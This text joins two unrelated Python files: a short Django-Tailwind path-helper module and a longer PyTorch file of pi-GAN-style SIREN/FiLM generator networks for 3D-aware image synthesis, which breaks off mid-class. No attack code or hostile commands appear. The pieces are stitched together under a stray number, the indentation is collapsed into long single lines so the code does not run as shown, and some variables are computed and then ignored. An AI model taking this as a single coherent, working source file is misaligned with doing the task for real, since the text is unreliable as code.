import json import os from django.apps import apps DJANGO_TAILWIND_APP_DIR = os.path.dirname(__file__) def get_app_path(app_name): app_label = app_name.split(".")[-1] return apps.get_app_config(app_label).path def get_tailwind_src_path(app_name): return os.path.join(get_app_path(app_name), "static_src") def get_package_json_path(app_name): return os.path.join(get_app_path(app_name), "static_src", "package.json") def get_package_json_contents(app_name): with open(get_package_json_path(app_name), "r") as f: return json.load(f) def is_path_absolute(path): return path.startswith("/") or path.startswith("http")
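# Illustrative behavior (assumes an installed app labelled "theme"; paths are examples):
#   get_package_json_path("theme")  -> "<theme app dir>/static_src/package.json"
#   is_path_absolute("/static/app.css")               -> True
#   is_path_absolute("https://cdn.example.com/x.js")  -> True
#   is_path_absolute("css/app.css")                   -> False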
11589914
import sys sys.path.append('/apdcephfs/share_1330077/starksun/projects/pi-GAN') import numpy as np import torch.nn as nn import torch import math import torch.nn.functional as F from .latent_grid import StyleGenerator2D from .layers import * class Sine(nn.Module): """Sine Activation Function.""" def __init__(self): super().__init__() def forward(self, x): return torch.sin(30. * x) def sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / 30, np.sqrt(6 / num_input) / 30) def first_layer_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-1 / num_input, 1 / num_input) def film_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / 30, np.sqrt(6 / num_input) / 30) def first_layer_film_sine_init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-1 / num_input, 1 / num_input) def kaiming_leaky_init(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: torch.nn.init.kaiming_normal_(m.weight, a=0.2, mode='fan_in', nonlinearity='leaky_relu') class CustomMappingNetwork(nn.Module): def __init__(self, z_dim, map_hidden_dim, map_output_dim, n_blocks=3): super().__init__() self.network = [nn.Linear(z_dim, map_hidden_dim), nn.LeakyReLU(0.2, inplace=True)] for _ in range(n_blocks): self.network.append(nn.Linear(map_hidden_dim, map_hidden_dim)) self.network.append(nn.LeakyReLU(0.2, inplace=True)) self.network.append(nn.Linear(map_hidden_dim, map_output_dim)) self.network = nn.Sequential(*self.network) self.network.apply(kaiming_leaky_init) with torch.no_grad(): self.network[-1].weight *= 0.25 def forward(self, z): frequencies_offsets = self.network(z) # z: (n_batch * n_point, n_channel)
frequencies = frequencies_offsets[..., :frequencies_offsets.shape[-1]//2] phase_shifts = frequencies_offsets[..., frequencies_offsets.shape[-1]//2:] return frequencies, phase_shifts def frequency_init(freq): def init(m): with torch.no_grad(): if isinstance(m, nn.Linear): num_input = m.weight.size(-1) m.weight.uniform_(-np.sqrt(6 / num_input) / freq, np.sqrt(6 / num_input) / freq) return init class FiLMLayer(nn.Module): def __init__(self, input_dim, hidden_dim): super().__init__() self.layer = nn.Linear(input_dim, hidden_dim) def forward(self, x, freq, phase_shift): x = self.layer(x) if x.shape[1] != freq.shape[1]: freq = freq.unsqueeze(1).expand_as(x) #TODO: all x conditioned on a single freq and phase_shift --> 
every x conditioned on a specific freq and phase_shift phase_shift = phase_shift.unsqueeze(1).expand_as(x) return torch.sin(freq * x + phase_shift) class TALLSIREN(nn.Module): """Primary SIREN architecture used in pi-GAN generators.""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(input_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3), nn.Sigmoid()) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = self.color_layer_linear(rbg) return torch.cat([rbg, sigma], dim=-1) class UniformBoxWarp(nn.Module): def __init__(self, sidelength): super().__init__() self.scale_factor = 2/sidelength def forward(self, coordinates): return coordinates * self.scale_factor class SPATIALSIRENBASELINE(nn.Module): """Same architecture as TALLSIREN but adds a UniformBoxWarp to map input points to -1, 1""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another 
model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENBASELINEHD(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use neural renderer""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. 
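# NOTE: unlike SPATIALSIRENBASELINE, the color head below emits a 64-channel feature
# vector with no sigmoid, intended as input to a downstream neural renderer rather
# than as final RGB (see the commented-out sigmoid in forward_with_frequencies_phase_shifts).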
def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) # rbg = torch.sigmoid(self.color_layer_linear(rbg))
rbg = self.color_layer_linear(rbg) return torch.cat([rbg, sigma], dim=-1) def sample_from_3dgrid(coordinates, grid): """ Expects coordinates in shape (batch_size, num_points_per_batch, 3) Expects grid in shape (1, channels, H, W, D) (Also works if grid has batch size) Returns sampled features of shape (batch_size, num_points_per_batch, feature_channels) """ coordinates = coordinates.float() grid = grid.float() batch_size, n_coords, n_dims = coordinates.shape sampled_features = torch.nn.functional.grid_sample(grid.expand(batch_size, -1, -1, -1, -1), coordinates.reshape(batch_size, 1, 1, -1, n_dims), mode='bilinear', padding_mode='zeros', align_corners=True) N, C, H, W, D = sampled_features.shape sampled_features = sampled_features.permute(0, 4, 3, 2, 1).reshape(N, H*W*D, C) return sampled_features def modified_first_sine_init(m): with torch.no_grad(): # if hasattr(m, 'weight'):
if isinstance(m, nn.Linear): num_input = 3 m.weight.uniform_(-1 / num_input, 1 / num_input) class EmbeddingPiGAN128(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details.""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(32 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. 
self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) x = torch.cat([shared_features, input], -1) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class EmbeddingPiGAN256(EmbeddingPiGAN128): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 64, 64, 64)*0.1) class SPATIALSIRENGRID(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use local latent sampled from grid""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.local_coordinates = True self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(32, 256, (len(self.network) + 1)*hidden_dim*2, n_blocks=1) self.grid_latent_network = StyleGenerator2D(out_res=32, out_ch=32, z_dim=z_dim, ch_mul=1, ch_max=256, skip_conn=False) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): latent_grid = self.grid_latent_network(z) input_grid = self.gridwarper(input) # range: (-1.4, 1.4) sampled_latent = self.sample_local_latents(latent_grid, input_grid) frequencies, phase_shifts = self.mapping_network(sampled_latent) if self.local_coordinates: # map global coordinate space into local coordinate space (i.e. 
each grid cell has a [-1, 1] range) preserve_y = sampled_latent.ndim == 4 # if latents are 2D, then keep the y coordinate global input = self.get_local_coordinates( global_coords=input, local_grid_length=32, preserve_y=False ) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, box_warp=False, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 x = self.gridwarper(input) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) def sample_local_latents(self, local_latents, xyz): B, local_z_dim, H, W = local_latents.shape # take only x and z coordinates, since our latent codes are in a 2D grid (no y dimension) # for the purposes of grid_sample we treat H*W as the H dimension and samples_per_ray as the W dimension xyz = xyz[:, :, [0, 2]].unsqueeze(1) # [B, H * W, samples_per_ray, 2] # all samples get the most detailed latent codes sampled_local_latents = nn.functional.grid_sample( input=local_latents, # (b, c, h, w) grid=xyz, # (b, 1, n_pixel, 2) mode='bilinear', # bilinear mode will use trilinear interpolation if input is 5D align_corners=False, padding_mode="zeros", ) # output is shape [B, local_z_dim, H * W, samples_per_ray] # put channel dimension at end: [B, H * W, samples_per_ray, local_z_dim] sampled_local_latents = sampled_local_latents.permute(0, 2, 3, 1) # merge everything else into batch dim: [B * H * W * samples_per_ray, local_z_dim] sampled_local_latents = sampled_local_latents.reshape(B, -1, local_z_dim) return sampled_local_latents def get_local_coordinates(self, global_coords, local_grid_length, preserve_y=True): local_coords = global_coords.clone() # it is assumed that the global coordinates are scaled to [-1, 1] # convert to [0, 1] scale local_coords = (local_coords + 1) / 2 # scale so that each grid cell in the local_latent grid is 1x1 in size local_coords = local_coords * local_grid_length # subtract integer from each coordinate so that they are all in range [0, 1] local_coords = local_coords - (local_coords - 0.5).round() # return to [-1, 1] scale local_coords = (local_coords * 2) - 1 if preserve_y: # preserve the y dimension in the global coordinate frame, since it doesn't have a local latent code coords = torch.cat([local_coords[..., 0:1], global_coords[..., 1:2], local_coords[..., 2:3]], dim=-1) else: coords = torch.cat([local_coords[..., 0:1], local_coords[..., 1:2], local_coords[..., 2:3]], dim=-1) return coords class SPATIALSIRENVOLUME(nn.Module): """Same architecture as SPATIALSIRENBASELINE but use local latent sampled from volume""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), 
FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(32, 256, (len(self.network) + 1)*hidden_dim*2) # self.volume_latent_network = VolumeStyleGenerator( # mapping_fmaps=z_dim, # style_mixing_prob=0.9, # Probability of mixing styles during training. None = disable. # truncation_psi=0.7, # Style strength multiplier for the truncation trick. None = disable. # truncation_cutoff=8, # Number of layers for which to apply the truncation trick. None = disable. # resolution=32, # fmap_base=512, # fmap_max=256) self.volume_latent_network = VolumeStyleGenerator(input_nc=z_dim, output_nc=32, n_samples=3, norm='batch', activation='ReLU', padding_type='zero') self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): latent_grid = self.volume_latent_network(z) input_grid = self.gridwarper(input) # interpolate latent # samples = F.grid_sample(latent_grid, # input[..., [0, 2]].unsqueeze(2), # align_corners=True, # mode='bilinear', # padding_mode='zeros') samples = sample_from_3dgrid(input_grid, latent_grid) frequencies, phase_shifts = self.mapping_network(samples) return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, box_warp=False, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., -self.hidden_dim:], phase_shifts[..., -self.hidden_dim:]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENSEMANTIC(nn.Module): """Same architecture as TALLSIREN but synthesis semantic map""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_sine = FiLMLayer(hidden_dim, hidden_dim) self.label_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 19)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 2)*hidden_dim*2) self.network.apply(frequency_init(25)) 
self.final_layer.apply(frequency_init(25)) self.label_layer_sine.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) start += self.hidden_dim end += self.hidden_dim sigma = self.final_layer(x) labels = self.label_layer_sine(x, frequencies[..., start:end], phase_shifts[..., start:end]) # TODO: w. / w.o softmax activation on label labels = self.label_layer_linear(labels) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENBASELINESEMANTIC(nn.Module): """Same architecture as SPATIALSIRENSEMANTIC but doesn't condition on geometry code when regressing labels""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 19)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 1)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with 
another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) sigma = self.final_layer(x) # labels = torch.sigmoid(self.label_layer_linear(x)) labels = self.label_layer_linear(x) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENDISENTANGLE(nn.Module): """Same architecture as TALLSIREN but use double latent codes""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. 
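# Disentangled conditioning: the geometry code modulates the FiLM trunk that predicts
# sigma, while the appearance code modulates only the color branch, so shape and
# appearance can in principle be varied independently.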
def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: why is this transform applied?
input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1)
class SPATIALSIRENDISENTANGLE_debug(nn.Module): """Same architecture as TALLSIREN but uses two latent codes""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_pre = nn.Sequential(nn.Linear(hidden_dim, hidden_dim)) # self.color_layer_sine = FiLMLayer(hidden_dim + 32, hidden_dim) # ray_direction dim: 3 --> 32
